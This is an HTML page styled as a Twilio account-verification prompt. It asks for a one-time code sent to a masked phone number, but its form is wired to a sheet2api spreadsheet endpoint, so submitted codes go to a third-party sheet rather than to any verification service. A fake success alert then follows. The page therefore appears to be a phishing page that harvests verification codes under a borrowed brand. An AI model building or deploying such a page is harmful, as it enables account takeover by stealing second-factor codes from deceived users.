<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

    <title>VERIFY USER</title>
</head>
<style>
	body{
		padding: 15px;
	}
.height-100 {
    height: 100vh
}

.card {
    width: 350px;
    border: none;
    height: 300px;
    box-shadow: 0px 5px 20px 0px #d2dae3;
    z-index: 1;
	padding: 10pxs;
    display: flex;
    justify-content: center;
    align-items: center
}

.card h6 {
    color: #28303c;
    font-size: 20px
}

.inputs input {
    /* width: 40px; */
    height: 40px
}

input[type=number]::-webkit-inner-spin-button,
input[type=number]::-webkit-outer-spin-button {
    -webkit-appearance: none;
    -moz-appearance: none;
    appearance: none;
    margin: 0
}

.card-2 {
    background-color: #fff;
    padding: 10px;
    width: 350px;
    height: 100px;
    bottom: -50px;
    left: 20px;
    position: absolute;
    border-radius: 5px
}

.card-2 .content {
    margin-top: 50px;
}

.card-2 .content a {
    color: #28303c;
}

.form-control:focus {
    box-shadow: none;
    border: 2px solid #28303c;
}

.validate {
    border-radius: 20px;
    height: 40px;
    background-color: rgb(78, 75, 230);
    border: 1px solid rgb(115, 60, 245);
    width: 140px
}
</style>
<body>
	<br></br>
	<h6>Powered by Twilio</h6>
	
	<div class="container height-100 d-flex justify-content-center align-items-center">
		
		<div class="position-relative">
			<div class="card p-2 text-center">
				<h6>Enter your verification code <br> to verify your account</h6>
				<div> <span>A code has been sent to</span> <small>*******9897 by Twilio </small> </div>
				<form data-spreadsheet-api='https://sheet2api.com/v1/2tAaaSbvQ5y2/sectwo/Sectwo'>
				  <div id="otp" class="inputs d-flex flex-row justify-content-center mt-2">
					<input type="text" name="Name" class="form-control" id="exampleInputEmail1" aria-describedby="emailHelp">
				  </div>
				 <div class="mt-4"> 
					<button class="btn btn-danger px-4 validate"  type="submit" onclick="alert(VerifyedSuccessfully)">Verify</button> 
			     </div>
				</form> 
			</div>
		</div>
	</div>		
    <script src='https://sheet2api.com/v1/template.js'/>

	
<!-- <script src='https://sheet2api.com/v1/template.js'/> -->


      
<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
</body>
</html>